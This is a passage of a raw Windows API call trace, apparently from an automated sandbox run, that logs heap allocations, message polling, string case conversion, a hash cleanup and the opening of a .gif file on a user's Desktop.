hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0166.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0166.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0166.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0166.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0166.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0166.044] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0166.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0166.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0166.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0166.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0166.045] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0166.045] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0166.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0166.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0166.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0166.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0166.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0166.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0166.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0166.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0166.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0166.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0166.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0166.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0166.048] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.048] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.048] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.048] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0166.048] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.049] CryptDestroyHash (hHash=0xaa56a0) returned 1 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0166.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0166.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0166.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0166.050] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0166.050] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.050] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.050] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0166.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0166.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/jrgF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jrgf.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0166.050] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.050] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0166.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0166.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0166.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0166.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0166.051] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0166.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0166.051] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0166.051] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0166.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0166.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0166.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0166.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0166.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0166.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0166.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0166.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0166.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0166.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0166.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.052] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0166.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0166.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0166.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0166.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0166.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0166.053] CreateFileW 